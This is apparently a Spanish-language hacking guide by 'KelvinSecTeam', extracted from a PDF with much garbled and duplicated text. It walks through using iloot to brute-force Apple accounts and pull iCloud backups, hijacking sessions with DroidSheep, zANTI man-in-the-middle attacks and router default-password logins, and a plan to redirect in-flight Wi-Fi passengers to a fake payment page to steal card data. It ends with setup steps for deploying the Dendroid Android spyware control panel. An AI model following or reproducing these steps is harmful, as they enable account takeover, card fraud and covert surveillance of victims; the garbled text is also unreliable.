Está en la página 1de 71
Autor: kelvin parra Grupo De Trabajo: KelvinSecTeam Escrito: 25-08-2016

Autor: kelvin parra Grupo De Trabajo: KelvinSecTeam Escrito: 25-08-2016

1

DEFINICION:

Este nuevo articulo completo de seguridad mobil consiste en visualizar los riesgos y aplicar tecnicas de hacking mobile desde un celular donde existen distintos y multiples metodos de la seguridad del mobil en tecnicas de explotacion, herramientas y definiciones que ayudaran a entender cada paso de los metodos que explicaremos y en algunos casos proteccion mobil.

1 DEFINICION : Este nuevo articulo completo de seguridad mobil consiste en visualizar los riesgos y

Black hat hacking “hacker de zombrero negro” : En el blackhat hacking en seguridad mobil se define de “hackers” con propositos malignos con fines de investigacion y exponer la vulnerabirilidad para darle una ventaja al pirata inforamtico utilizar la tecnica o vender esta tecnica llamadas “0day” en el sitios DarkNets por un cambio de bitcoin.

Research Security “Investigador De Seguridad” : En este caso solo se basaria en indentificar el erorr y en algunos casos explotar la vulnerabirilidad con fines de reportar la vulnerabirilidad y llevarla a algun soporte tecnico de la empresa para que arregle el problema presentado por el investigador de seguridad.

Area De Trabajo:

Redes: C onsiste en el estudio o del uso automatizado de herramientas para testear redes WPA o WPA2. Aplicación Web Security: Este es el que lleva el cargo de testear y buscar vulnerabirilidades web.

2

SEGURIDAD IPHONE:

2 S EGURIDAD IPHONE : Ante la variacion entre el uso de iphone o android la

Ante la variacion entre el uso de iphone o android la mas afectada es android aunque queremos incorporar la seguridad iphone para dar una detallada explicacion sobre de lo que se trata “Seguridad mobil” y se efectua en cualquier sistema operativo.

Rasgos De Seguridad:

1)

Red De Comunicación

2)

Reverse Engginer

3)

Privacidad

4)

Esquemas De direcciones

5)

Notificaciones De Inserccion

6)

Almacenamiento De Datos De La Aplicación

Los hackers son aquellos que buscan investigar estos rasgos ahora lo compartimos y comerciamos a usuarios que quieren aprender y pueda ser una ayuda o una guia para la motivacion a otro usuarios seguir investigando y buscar nuevos metodos.

  • 3 JAILBREAK EN IPHONE

3 J AIL B REAK EN I PHONE Definicion: Jailbreak nunca fue permitido por las empresas

Definicion:

Jailbreak nunca fue permitido por las empresas pues personas han creido que el Jailbreak es un metodo que fue aceptado vor las empresas para permitir la ejecucion de cualquiera aplicación en el dispotivo de ubicación externa es decir como por ejemplo la descarga de malware en portales webs y hacer estas “Supuestas” aplicacioens ejecutables.

Herramienta Automatizada:

Todo surgio en un exploit y conjunto de terminales el duscubrimiento de un fallo de seguridad que permitia hacer una funcion que no permitia tanto Iphone Y Android pero ahora con el estudio de la logica del rompimiento de la seguridad y la ayuda de programadores con pensamiento hacking han desarrollado variedades de herramientas para realizar el jailbreak automatizado desde un software que puede correr en distintos sistemas operativos de tu ordenador.

Herramientas a utilizar durante jailbreak Iphone:

1) Pwnage Tool 2) JailBreakMe 3) Greenpois0n

4

EMPEZAR JAILBREAK CON PWNAGE TOOL

Categoria De herramientas automatizadas para jailbreak:

Pwnage Pwnage: En conjunto para hacer jailbreak al iPhone, iPod touch , y el iPhone 3G. ARM7 Go (de iOS 2.1.1) : por jailbreak tethered en el iPod touch 2G. Limera1n Exploit :T ethered jailbreak para el iPhone 3GS, iPod touch 3G, iPad, iPhone 4, iPod touch 4G y Apple TV 2G. usb_control_msg Exploit : también conocido como "steaks4uce para jailbreak tethered en el iPod touch 2G.

Gracias a Theiphonewiki por dar soporte a los exploits de cada version en Iphone y vamos ahora a utilizar estas herramientas y definirlas:

Versiones que permite realizar Jailbreak PwNAGE TOOLS:

4 E MPEZAR J AILBREAK CON PWNAGE TOOL Categoria De herramientas automatizadas para jailbreak: Pwnage Pwnage:https://www.theiphonewiki.com/wiki/Jailbreak_Exploits Gracias a Theiphonewiki por dar soporte a los exploits de cada version en Iphone y vamos ahora a utilizar estas herramientas y definirlas: Versiones que permite realizar Jailbreak PwNAGE TOOLS: " id="pdf-obj-4-22" src="pdf-obj-4-22.jpg">

Pwnage Tool:

Pwnage Tool: Es una herramienta de jailbreak iOS para Mac OS X que fugas de porhttp://blog.iphone-dev.org/post/1359246784/20102010-event Firmware: http://www.felixbruns.de/iPod/firmware/ Una vez descargado tanto el Pwnage Y Firmware ejecutamos el “Pwnage” y nos aparecera como a continuacion: " id="pdf-obj-5-4" src="pdf-obj-5-4.jpg">

Es una herramienta de jailbreak iOS para Mac OS X que fugas de por crear un IPSW. Se le permite cambiar logos de arranque y añadir paquetes pre-instalado para el IPSW. Una vez creado un IPSW que se puede utilizar para restaurar a través de iTunes.

Disponibilidad: Windows Y MAC

Pwnage Tool: Es una herramienta de jailbreak iOS para Mac OS X que fugas de porhttp://blog.iphone-dev.org/post/1359246784/20102010-event Firmware: http://www.felixbruns.de/iPod/firmware/ Una vez descargado tanto el Pwnage Y Firmware ejecutamos el “Pwnage” y nos aparecera como a continuacion: " id="pdf-obj-5-15" src="pdf-obj-5-15.jpg">

Una vez descargado tanto el Pwnage Y Firmware ejecutamos el “Pwnage” y nos aparecera como a continuacion:

Ahora debes clicekar en un modelo:

Ahora debes clicekar en un modelo: Seleccionamos: Ahora nos saldra un opcion de busqueda de la

Seleccionamos:

Ahora debes clicekar en un modelo: Seleccionamos: Ahora nos saldra un opcion de busqueda de la

Ahora nos saldra un opcion de busqueda de la IPSW para los que no saben que es un fichero IPSW es u fichero que sirve para restaurar Tu iPhone o Ipad, Ipod.

Seleccionamos el IPSW:

Seleccionamos el IPSW:

Seleccionamos el IPSW:

Ahora nos saldra un menu

Ahora nos saldra un menu Ahora vamos a Cydia Packages y una vez dentro de esa

Ahora vamos a Cydia Packages y una vez dentro de esa opcion del menu presionamos en “Refresh”

Ahora nos saldra un menu Ahora vamos a Cydia Packages y una vez dentro de esa

Ahora seleccionamos 1 del listado “Open SSH” y presionamos en en la flechita “Azul” que se encuentra en la parte inferior derecha.

Selecciona en build y presionamos en la flechita azul de nuevo. Ahora presionamos en “SAVE” y

Selecciona en build y presionamos en la flechita azul de nuevo.

Selecciona en build y presionamos en la flechita azul de nuevo. Ahora presionamos en “SAVE” y

Ahora presionamos en “SAVE” y comenzara a aplicar la accion de construccion del firmware.

Selecciona en build y presionamos en la flechita azul de nuevo. Ahora presionamos en “SAVE” y

Ahora por ultiimo nos dara un mensaje donde dice “Conecto El Dispositivo” y Active En Modo DFU.

Ahora por ultiimo nos dara un mensaje donde dice “Conecto El Dispositivo” y Active En Modo

Conectamos el dispositivo y activamos el modo DFU.

Y Jailbreak Completo.

Informacion: Este es el metodo automatizado del jailbreak en un dispositivo Ipod , Iphone, Ipad.

Promesas De Jailbreak ante Iphone:

1)

Jailbreak – Permite instalar cualquiera otra aplicación externa.

2)

Jailbreak – tiene como significado saltar la seguridad del dispositivo y obtener privilegios.

  • 5 IPHONE BACKUP & ICLOUD:

Un dia publicamos en kelvinsecurity el metodo automatizado de usar y obtener por medio de una herramienta ejecutada en el lenguaje de programacion python que aplica la siguiente funcioens:

1)

Permite lanzar ataques de fuerza bruta a cuentas de Apple

2)

Permite obtener la backup de una cuenta de Icloud.

Direccion de descarga: https://github.com/hackappcom/iloot

1)

Herramineta iloot permitiria extraer la backup de una cuenta de Apple

Requisitos:

Sistema operativo: Linux o windows Python 2x

Instalacion:

pip install -r requirements.txt

ejecucion inicial y lista de comandos:

python iloot.py -h

usage: iloot [-h] [--threads THREADS] [--output OUTPUT] [--combined] [--snapshot SNAPSHOT] [--itunes-style]

[--item-types ITEM_TYPES [ITEM_TYPES ... [--keep-existing] apple_id password

]]

[--domain DOMAIN]

Necesitas el (Usuario – Contraseña de la cuenta Apple)

apple_id

Apple ID

password

Password

Ejecucion en la terminal: iloot.py email password

Transcurso de la sesion -

apple_id Apple ID password Password Ejecucion en la terminal: iloot.py email password  Transcurso de la

Ahora nos da el siguiente mensaje:

apple_id Apple ID password Password Ejecucion en la terminal: iloot.py email password  Transcurso de la

“Quiere usted descargar el libro de direcciones, mensajes y fotos” Si => (Yes)

Y asi de automatizado funciona la herramienta. Ficheros Y Su Contenido: AddressBook.sqlitedb información de contacto y

Y asi de automatizado funciona la herramienta. Ficheros Y Su Contenido:

AddressBook.sqlitedb

información de contacto y datos personales como nombre, dirección de correo electrónico, cumpleaños, organización, etc ...

AddressBookImages.sqlitedb

imágenes asociadas con los contactos guardados

Call_history.db

entrante y registros de llamadas salientes, incluyendo números de teléfono y marcas de tiempo Mensajes de texto y multimedia

com.apple.accountsettings.plist

datos sobre todas las cuentas de correo electrónico que se configuran en el Aplicación de correo electrónico de Apple

com.apple.network.identification.plist

datos de la red inalámbrica, incluyendo la dirección IP, la dirección IP del router, SSID y marcas de tiempo

consolidated.db

Tiendas GPS los datos de seguimiento

Voicemail.db

Mensajeria De Voz

 
 

Existe otra herramienta y es la de fuerza bruta por que muchas vecess hemos notado distintos tipos de seguridad pero no hemos visto uno que “Salte la autentificacion” y entre de inmediatamente a los correos de apple en ese caso existen 2 funciones que podemos usar para lanzar el ataque.

1) Por fuerza bruta: la fuerza bruta se podra utilizar desde una herramineta automatizada en lenguaje python o desde un portal web desarrollada en PHP y con el uso de un diccionario de contraseñas normalmente se utilizar el ataque de fuerza bruta por que “Apple” no bloquea los intentos de acceso en caso a una direccion IP.

2) Preguntas De Seguridad: Hemos notado preguntas de seguridad debiles para los amantes del doxing se les ara facil y es que las preguntas de seguridad suelen ser algo sencillas en cuanto las preguntas mas facilitadas como “En que ciudad nacio tu madre” o “el nombre de tu perro” ect.

  • 6 APLICACIONES PENTESTING

Existe una gran variedad de herramientas de pentesting que puedes ejecutarla en tu android son aplicaciones que necesitan que tu telefono se encuentre roteado para tener los permisos necesarios para empezar a realizar las funciones como las siguientes:

1)

Scanneo y identificacion de dispositivos en una red

2)

Scanneo y visualizacion del trafico en la Red Wifi

3)

Realizar Ataques MITM

4)

Scanner de puerto

5)

Conexión a puertos y identificar

6)

Sacar informacion de un host

7)

Ataques DoS

8)

Auditacion de password y aplicación de direccionarios para fuerza bruta

9)

Establecer conexiones remotas

Puerto Scanner: Se encargar lanzar un mapeo de los puertos entre ellos lo mas conocidos dentro de una IP local o de un servidor entre los puertos se encuentran los mas conocidos y son los puertos 8080 :80 .5900 .21 .23.

Ataque MITM: El Man-in-the-middle que consiste en que el atacante se interpone entre el cliente y el servidor. Con este ataque demostraremos como se pueden obtener credenciales en una conexión segura.

Ahora vamos a sniffear la red con una aplicación llamada droidsheep es utilizada en android:

Direccion De Descarga: <a href=http://droidsheep.downloadxapp.com/ 7 R OBAR S ESIONES CON DROIDSHEEP Bueno antes que todo hay que estar conectado a una red wifi y empezar a scannear desde la aplicación android DROIDSHEEP existen un nivel entre DROIDSHEEP y ZANTI y es que ZANTI se encuentra mejor personalizada y con mas opciones. Secuestro De Sesion: Sólo hay un cliente dentro de la red inalámbrica que se es el único que envía y recibe paquetes " id="pdf-obj-15-2" src="pdf-obj-15-2.jpg">

Direccion De Descarga: http://droidsheep.downloadxapp.com/

  • 7 ROBAR SESIONES CON DROIDSHEEP

Bueno antes que todo hay que estar conectado a una red wifi y empezar a scannear desde la aplicación android DROIDSHEEP existen un nivel entre DROIDSHEEP y ZANTI y es que ZANTI se encuentra mejor personalizada y con mas opciones.

Secuestro De Sesion:

Sólo hay un cliente dentro de la red inalámbrica que se es el único que envía y recibe paquetes

Una petición HTTP envía será recibido por el punto de acceso inalámbrico y, usando enrutamiento TCP

Una petición HTTP envía será recibido por el punto de acceso inalámbrico y, usando enrutamiento TCP / IP, el paquete será enviado al servidor web. Si la red inalámbrica está activada la seguridad (por ejemplo, usando WPA-2 y una clave fuerte), un atacante no es capaz de leer cualquier paquete HTTP y por lo tanto no puede robar identifica la sesión del usuario. con sólo escuchara la red.

Capturando Sesiones:

La herramienta tiene 2 opciones y es el sistema esta automatizado para indetificar aquellas paginas sobre

La herramienta tiene 2 opciones y es el sistema esta automatizado para indetificar aquellas paginas sobre “HTTP” se encuentra con 2 opciones solamente “START” y “STOP”.

Aca hay un problema y es que los ataques MITM “Mitiga” cuando facebook establece su cifrado seguro de sesiones y implementa el “Https” dejando a ataques como MITM sin poder realizar la captura de sesiones por lo tanto este solo debie empezar a capturar sesiones sobres los problemas de certificados SSL y durante la web se encuentre en http.

Para abrir una sesion solamente debemos es clickear sobre una y saldran 3 opciones y vamos la opcion de abrir pagina normal.

La herramienta tiene 2 opciones y es el sistema esta automatizado para indetificar aquellas paginas sobre

Una vez ya deberiamos estar observando dentro de la aplicación la sesion:

DroidSheep utiliza su programa nativo para capturar paquetes. Esta programa nativo utiliza libpcap, una biblioteca de

DroidSheep utiliza su programa nativo para capturar paquetes. Esta programa nativo utiliza libpcap, una biblioteca de acceso a la red proporcionada por el núcleo y por defecto incluido en cualquier distribución androide. DroidSheep utiliza estas funciones proporcionadas por libpcap:

Nombre De Funcion:

Descripcion:

pcap_lookupdev

función de búsqueda para la interfaz de red

por defecto en el dispositivo.

 

pcap_lookupnet

d eterminar la dirección de red y la máscara

de subred del dispositivo

 

pcap_open_live

escuchar

paquetes

recibidos

por

el

dispositivo

pcap_compile

Compila una expresion de un filtro

 

pcap_loop

Inicia un bucle sin fin escucha de paquetes y llamadas método de devolución de llamada

para cada paquete capturado

 

pcap_freecode

Desasigna la memoria para el compilado

 

pcap_close

Cierra de captura de la sesion

 

8

COMO UTILIZAR - ZANTI

8 C OMO UTILIZAR - ZANTI Zanti: Es una herramienta que pocos utilizan y los expertos

Zanti: Es una herramienta que pocos utilizan y los expertos de seguridad informática la utilizan a menudo en sus celulares con tecnología “Android” para detectar todo tipo de redes y robar contraseñas además de desafiar al servidor escaneando puertos y reconociendo dispositivos como “Impresoras” , “Celulares blackberry” , “Android” , “WindowPhone” , “Routers” y cualquier otra tecnología conectada a una red y con sus puertos abiertos facilitando al pirata realizar acciones que puedan perjudicar al usuario conectado a una misma red.

Descargar Aplicacion:

Zanti: tiene 2 opciones la premium y la free , obviamente para el usuario como tal pueden descargar la free por medio del vinculo:

https://www.zimperium.com/zanti-mobile-penetration-testing donde deberán llenar datos como su dirección de correo electrónico y clickear en “Dowload”.

Root En Android:

El celular debe estar rooteado para darle los permisos necesarios que necesita la aplicación para utilizar nuestro celulares y empezar a auditar todo tipo de redes además de vulnerar otros dispositivos.

DESPUES DEL ROOT:

Ahora podemos utilizar “ZANTI” abrimos la aplicación “recuerda que debemos estar en una red WIFI, conectado”

DESPUES DEL ROOT: Ahora podemos utilizar “ZANTI” abrimos la aplicación “recuerda que debemos estar en una

Una vez instalado zanti y ejecutado además de conectarnos a una red “WIFI” donde muchas personas estén conectadas en este momento sean ordenadores o celulares, nos muestra una lista de direcciones IPS asignadas además de su dirección “MAC” , además podemos visualizar los “Logos” o “Icons” de cada dispositivo donde encontramos laptops y celulares conectados a continuacion ..

VISUALIZANDO UNA VICTIMA:

VISUALIZANDO UNA VICTIMA: • Clickeamos en nuestra primera victima y se trata de un “Modem” en

Clickeamos en nuestra primera victima y se trata de un “Modem” en que estamos conectados por la dirección por defecto de configuración podría ser la “192.168.0.1 o 192.168.1.1” pero el problema general serian los puertos podemos realizar una fuerza bruta para buscar los puertos en caso que el puerto “80” que nos permite visualizar por medio de una plataforma web este desactivado posiblemente tenga el puerto “443” que también nos permitiría visualizarlo entonces la herramienta nos ayudaría a buscar esos puertos, en la opcion “Password Complexity Audit”.

BUSCAR EL PUERTO PERFECTO:

Dejamos el “Automatic Mode” en “ON”
Dejamos
el
“Automatic Mode”
en
“ON”

y

dejamos

el

cracking method en

“Small Dictionary” y luego presionamos en “GO”.

VER LOS PUERTOS Y CONTRASEÑAS POR DEFECTO:

VER LOS PUERTOS Y CONTRASEÑAS POR DEFECTO: Ahora que nos muestra los puertos sabemos 3 tipos

Ahora que nos muestra los puertos sabemos 3 tipos de conexiones seguras pero posiblemente “Protegidas por una contraseña por defecto o modificada”, ahora por medio del puerto “21” significa manipulación de logs o ficheros del modem, por el puerto 23 conexión al menu y configuración del modem, y por medio del puerto 80 y 443 podría ser que el modem este protegido o quizás no, la herramienta también tiene una capacidad de realizar un ataque de fuerza bruta para descifrar la contraseña por defecto.

ACCEDIENDO POR DEFECTO:

Las contraseñas por defecto de un modem podrían ser una vez conectado a la red puerto 80 podría lanzarnos 2 tipos de autentificación 1) Www-authenticate 2) formulario de “Usuario y Contraseña” simple.

Contraseñas por defecto: admin:password admin:Sin_Contraseña admin:admin user:12345 admin:123456 admin:123 administrador:123456

TIPO DE AUTENTIFICACION:

VER LOS PUERTOS Y CONTRASEÑAS POR DEFECTO: Ahora que nos muestra los puertos sabemos 3 tipos

“2002 OK” > se carga sin ninguna autenticación. “401 Unauthorized”> pancartas con WWW Authenticate indicar un nombre de usuario y

contraseña

La autenticación es posible, pero aún no se logra, a diferencia de "403 Forbidden” ,Algunas banners anuncian por defecto.

AVISO DE CONTRASEÑAS AL PUBLICO MEDIANTE UN HTTP TRACER:

contraseña La autenticación es posible, pero aún no se logra, a diferencia de "403 Forbidden” ,Algunas

Este caso se ve mucho y es que cuando nos conectamos a una dirección IP de un modem o producto o router nos lanza la contraseña por defecto sin tener que estar aplicando la fuerza bruta con “ZANTI”, password:1234 y como usuario ninguno.

ATAQUE MITM:

contraseña La autenticación es posible, pero aún no se logra, a diferencia de "403 Forbidden” ,Algunas

Es un

ataque

en

el

que se adquiere la capacidad de leer, insertar y modificar a

voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas.

Ataque Man-in-the-middle Con Zanti

contraseña La autenticación es posible, pero aún no se logra, a diferencia de "403 Forbidden” ,Algunas

Zanti tiene una opción de ataque main in the middle que permite que tu veas las sesiones que tiene tu victima en facebook, twitter o yahho amazon ect.

  • 9 COMO UN HACKER PUEDE VINCULAR PHISHING CON ZANTI

Zanti tiene una opción de ataque main in the middle que permite que tu veas las

EL TEMA DE QUE HABLAMOS ES LA PROVEEDORA DE INTERNET "GoGo - WIFI" UNA EMPRESA YA INSTALADA EN DIFERENTES AEREOLINEAS YA HABLAMOS ANTERIORMENTE EN OTRO DE MIS BLOGS DE "KELVINSECTEAM" EN QUE EXPLICA VAMOS QUE TAMBIÉN PUEDE SER UTILIZADO PARA FINES TERRORISTAS INVOLUCRANDO A OTROS CIUDADANOS CONECTADOS A UNA MISMA RED. TAMBIÉN HE VISTO OTRO VIDEO LLAMADO "WIFI-GOGO HACK" DONDE UNA PERSONA SEGÚN EL O ELLA HA DESCUBIERTO UNA MENERA DE BYPASSEAR "SALTEARSE" LA PETICIÓN DE CREDENCIALES O MAS BIEN EL "PAGO EN LINEA DESDE LA WEB GOGO".

Mapa De técnica:

1 - (abrir zanti)

=>

3- (ingresar ejemplo: www.tuphishinpayment.com)

4- (cualquier usuario conectado a la red wifi será redireccionado al phishing al abrir su navegador en su mobil o Tablet)

3- (ingresar ejemplo: <a href=www.tuphishinpayment.com ) 4- (cualquier usuario conectado a la red wifi será redireccionado al phishing al abrir su navegador en su mobil o Tablet) MUY BIEN UNA VEZ MONTADOS EN EL AVION VAMOS A BUSCA UNA RED "WIFI" NOS ENCONTRAMOS CON LA DE GOGO SE ENCUENTRA LIBERADA PERO TIENE RESTRICCION DE NAVEGACION UNA DE LAS COSAS QUE QUIERO DECIR ES QUE NO HE TENIDO LA OPORTUNIDAD PARA YO "AUDITAR" EN VIVO Y EN PERSONA A "GoGo" EN UNA AEREOLINEA COMO ES AMERICAN AIRLINE. BIEN EL PROBLEMA DE SEGURIDAD PODRÍA SER EL SIGUIENTE: 1 ) AL PESAR QUE NO TENEMOS ENCONTRAMOS CONECTADOS. FORMA ALGUNA DE NAVEGAR NOS 2 ) PODEMOS USAR UN ATAQUE "MAIN IN THE MIDDLE" Y ROBAR CREDENCIALES DE PERSONAS QUE VIAJAN ATRAVES DEL MISMO AVION. 3 ) POSIBLEMENTE EXISTEN UN MÉTODO DE CREAR UN "FALSO PAYMENT" UN FALSO SISTEMA DE PAGO CREAR UN SCAM DESDE NUESTRO ORDENADO LUEGO SUBIRLO A UN SERVIDO Y UTILIZAR UNA HERRAMIENTA AUTOMATIZADA COMO "ZANTI" PARA REDIRIGIR TODO USUARIO EN EL AVION CONECTADOS A LA RED WIFI A UN FALSO VINCULO DE PAGO DE LA AEREOLINEA Y GOGO. " id="pdf-obj-25-8" src="pdf-obj-25-8.jpg">

MUY BIEN UNA VEZ MONTADOS EN EL AVION VAMOS A BUSCA UNA RED "WIFI" NOS ENCONTRAMOS CON LA DE GOGO SE ENCUENTRA LIBERADA PERO TIENE RESTRICCION DE NAVEGACION UNA DE LAS COSAS QUE QUIERO DECIR ES QUE NO HE TENIDO LA OPORTUNIDAD PARA YO "AUDITAR" EN VIVO Y EN PERSONA A "GoGo" EN UNA AEREOLINEA COMO ES AMERICAN AIRLINE.

BIEN EL PROBLEMA DE SEGURIDAD PODRÍA SER EL SIGUIENTE:

1)

AL

PESAR

QUE

NO

TENEMOS

ENCONTRAMOS CONECTADOS.

FORMA ALGUNA DE NAVEGAR NOS

2) PODEMOS USAR UN ATAQUE

"MAIN

IN

THE

MIDDLE"

Y

ROBAR

CREDENCIALES DE PERSONAS QUE VIAJAN ATRAVES DEL MISMO AVION.

3) POSIBLEMENTE EXISTEN UN MÉTODO DE CREAR UN "FALSO PAYMENT" UN FALSO SISTEMA DE PAGO CREAR UN SCAM DESDE NUESTRO ORDENADO LUEGO SUBIRLO A UN SERVIDO Y UTILIZAR UNA HERRAMIENTA AUTOMATIZADA COMO "ZANTI" PARA REDIRIGIR TODO USUARIO EN EL AVION CONECTADOS A LA RED WIFI A UN FALSO VINCULO DE PAGO DE LA AEREOLINEA Y GOGO.

--- EL CATALOGO DE PAGO POR SERVICIO -- ESA ES LA RESTRICCIÓN DE NAVEGACIÓN A OTRAS

--- EL CATALOGO DE PAGO POR SERVICIO --

--- EL CATALOGO DE PAGO POR SERVICIO -- ESA ES LA RESTRICCIÓN DE NAVEGACIÓN A OTRAS

ESA ES LA RESTRICCIÓN DE NAVEGACIÓN A OTRAS DIRECCIONES URL.

PROBLEMAS

1) NO PUEDES NAVEGAR POR OTRAS DIRECCIONES PERO SI TE POPORCIONA INTERNET 2) TE EMITE MÉTODOS DE PAGO PARA VER PELÍCULAS EN LINEA

VENTAJA:

PUEDES REALIZAR EL ATAQUE MITM SIN POBLEMAS UNO DE LOS PROBLEMAS DE GOGO SU PAGINA NO TIENE HTTPS ES DECIR NO SE PROTEGE POR UN CANAL SEGURO CIFRADO POR LO TANTO EL HTTP TE HACE MAS VULNERABLE A CUALQUIER VULNERABILIDAD.

UNA DE LAS DESVENTAJAS ES QUE LA MAYORIA DE LA PAGINA YA ESTAN UTILIZAN EL "HTTPS" Y POR LO TANTO NO SUELE SER TAN CASUAL LANZAR UN ATAQUE MITM EN QUE TE GESTIONE CREDENCIALES EMAIL - PASSWORD DE UNA PAGINA SOCIAL COMO FACEBOOK O TWITTER O GMAIL.

OFREZCO LA HERRAMIENTA "ZANTI" PARA ANDROID DONDE PUEDES REALIZAR UN ATAQUE MITM ADEMAS DE OTRAS OPCIONES.

UNA DE LAS DESVENTAJAS ES QUE LA MAYORIA DE LA PAGINA YA ESTAN UTILIZAN EL "HTTPS"

SI TE LO BAJAS EN TU TABLET PUEDES ACTIVAR EL MITM EN ESTA OPCION DE ESTA HERRAMIENTA ROBA CREDENCIALES DE CIERTAS PAGINAS DE CUALQUIER TIPO DE DISPOSITIVO CONECTADO A LA RED:

- FACEBOOK - TWITTER - AMAZON - GMAIL - INSTAGRAM ECT ..

MAS ABAJO TENEMOS EL REDIRECT HTTP ES EL QUE NOS CONVENZE MAS YA QUE RECUERDA QUE LA PAGINA PRINCIPAL: http://www.gogoair.com SE ENCUENTRA HTTP Y ESO NOS HACE LA FACILIDAD DE CREAR UN SCAM LUEGO SUBIR A UN SERVIDOR Y LUEGO UTILIZAR LA HERRAMIENTA DE ABAJO LLAMADA REDIRECCT HTTP Y INCLUIR NUESTRA DIRECCION DE SCAM Y LLEVANDO A NUESTRAS VICTIMAS A UN VINCULO FALSOS PARA CAPTURAR

LAS CREDENCIALES DE TARJETAS DE CREDITO.

10VIRUS Y TROYANOS ANDROID

10 VIRUS Y TROYANOS ANDROID En realidad la mayoria son troyanos y cumplen algunos la funcion

En realidad la mayoria son troyanos y cumplen algunos la funcion de infectar tu sistema operativo android de tu celular o tablet con la finalidad de espiar y capturar contraseñas que son enviadas a un servidor y este servidor a un cliente el cual es el atacante.

Android Malware:

Catacteristicas:
 

Catacteristicas:

1)

utiliza root exploits

2)

varia entre mas de 50 apps en la tienda

DROIDDREAM

3)

instala aplicaciones segundarias

Caracteristicas:
 

Caracteristicas:

1)

Funcion Virus bancario

Spitmo - zeus

 
Caracteristicas:
 

Caracteristicas:

1)

Utiliza 3 exploits

2)

Una backdoor

Obad - Troyano

3)

Envia Mensajes Troyanizados

Caracteristicas:
 

Caracteristicas:

1)

Infecta A dispositvos por medio de 1

2)

aplicación generada Puede ser manupulado por medio de

Dendroid -- Troyano

un servidor con plataforma administrativa.

 

3)

Graba Audio y Video del dispositivo.

Funciones De Troyanos:

1)

GPS

2)

Grabaciones de audios

3)

Mensajeria y Trafico de correo electronico

4)

Visualizacion de fotografias

5)

Registro de llamadas

Pero no existen solo troyanos con fines malignos o comerciales en sentido del blackhat hacking tambien existen otros que en sus portales webs han publicado que estas aplicaciones serian una ayud para para proteger a sus hijos y monitorear empleados.

Caracteristicas: 1) Utiliza 3 exploits 2) Una backdoor Obad - Troyano 3) Envia Mensajes Troyanizados Caracteristicas:

Y que nos ofrece:

Y que nos ofrece: En el panel administrtivo para aclarar las funciones:

En el panel administrtivo para aclarar las funciones:

Y que nos ofrece: En el panel administrtivo para aclarar las funciones:

11COMIENZOS CON DENDROID

11C OMIENZOS CON DENDROID Introduccion: DENDROID es una herramineta que funciona con fines de espionaje que

Introduccion:

DENDROID es una herramineta que funciona con fines de espionaje que se utiliza para infectar a dispositivos android este suele tener una guia de instalacion ademas tambien se encunetra libre el codigo para ser modificado e instalado.

Funciones que cumple DENDROID:

1)

Almacena el historial de llamadas del dispositvo infectado

2)

Envia mensajes y borra mensajes de la victima

3)

Visible la lista de contactos del mobil infectado

4)

Graba Audios Y Video

5)

Tiene la capacidad de enviar mensajes a todos los contactos

6)

Tiene un modo de interceptacion

7)

Visualiza los mensajes que llegan y se envian

Requisitos:

Requisitos: 1) Disponer de un servidor preferiblemente acceso al Cpanel donde podras interactuar con 2) elhttps://github.com/nyx0/Dendroid DOWLOAD ZIP. y donde clone or dowload presionamos y clickeamos en " id="pdf-obj-32-4" src="pdf-obj-32-4.jpg">

1)

Disponer de un servidor preferiblemente acceso al Cpanel donde podras interactuar con

2)

el “phpmyadmin” “mysql” y Almacenar los ficheros de DENDROID en php. JAVA SDK para la modificacion del codigo java de DENDROID

Instrucciones de descarga:

1)

Vamos al sitio de github donde se encuentra totalmente liberada:

Requisitos: 1) Disponer de un servidor preferiblemente acceso al Cpanel donde podras interactuar con 2) elhttps://github.com/nyx0/Dendroid DOWLOAD ZIP. y donde clone or dowload presionamos y clickeamos en " id="pdf-obj-32-24" src="pdf-obj-32-24.jpg">

DOWLOAD ZIP.

y donde clone or dowload presionamos y clickeamos en

Ahora visualizaremos lo que hemos descomprimido del ZIP:

Ahora visualizaremos lo que hemos descomprimido del ZIP: En total son 3 carpetas y la que

En total son 3 carpetas y la que instalaremos en nuestro servidor web es Dendroid Panel alli se encuentra los scripts PHP.

Ahora visualizaremos lo que hemos descomprimido del ZIP: En total son 3 carpetas y la que

Ahora como podras observar entramos a la carpeta y ahora te dire cual carpeta esta los script PHp y estna en “PANEL” y en “Other Files” se encuentra el fichero .sql que importaremos en PHPMYADMIN.

Bien ahora vamos a ver lo que la carpeta panel nos tiene

Bien ahora vamos a ver lo que la carpeta panel nos tiene Y vamos a editar

Y vamos a editar las siguientes estas las agregaremos los datos de la base de datos que vamos ha crear y modificar las direcciones URLs.

applysettings.php

blockbot.php

clearawaiting.php

clearmessages.php

deletebot.php

deletefile.php

deletepics.php

functions.php

table.php

bien ahora aparecera esta direccion en algunos ficheros:

bien ahora aparecera esta direccion en algunos ficheros: Si tenemos el dominio “pizzachip.com” que es unwww.pizzachip.com ”; por $url =”www.tuweb.com”; bien agregas la direccion web donde has sibido los ficheros. Ahora vamos a modificar en otro lugar de algun fichero en PHP el keylimepie eso dira en los ficheros siguientes: get.php get-functions.php new-upload.php upload-pictures.php lo cual cuando diga “keylimepie” a “password”.  Saldra esa misma forma “keylimepie” lo cual modificaremos por “password”. " id="pdf-obj-35-4" src="pdf-obj-35-4.jpg">

Si tenemos el dominio “pizzachip.com” que es un ejemplo que viene por defecto en los ficheros tendiramos que cambiarlo por la direccion de nuestro servidor exactamente donde hemos subidos los ficheros.

Podificamos el $url = www.pizzachip.com”; por $url =”www.tuweb.com”; bien agregas la direccion web donde has sibido los ficheros.

Ahora vamos a modificar en otro lugar de algun fichero en PHP el keylimepie eso dira en los ficheros siguientes:

get.php

get-functions.php

new-upload.php

upload-pictures.php

lo cual cuando diga “keylimepie” a “password”.

bien ahora aparecera esta direccion en algunos ficheros: Si tenemos el dominio “pizzachip.com” que es unwww.pizzachip.com ”; por $url =”www.tuweb.com”; bien agregas la direccion web donde has sibido los ficheros. Ahora vamos a modificar en otro lugar de algun fichero en PHP el keylimepie eso dira en los ficheros siguientes: get.php get-functions.php new-upload.php upload-pictures.php lo cual cuando diga “keylimepie” a “password”.  Saldra esa misma forma “keylimepie” lo cual modificaremos por “password”. " id="pdf-obj-35-24" src="pdf-obj-35-24.jpg">

Saldra esa misma forma “keylimepie” lo cual modificaremos por “password”.

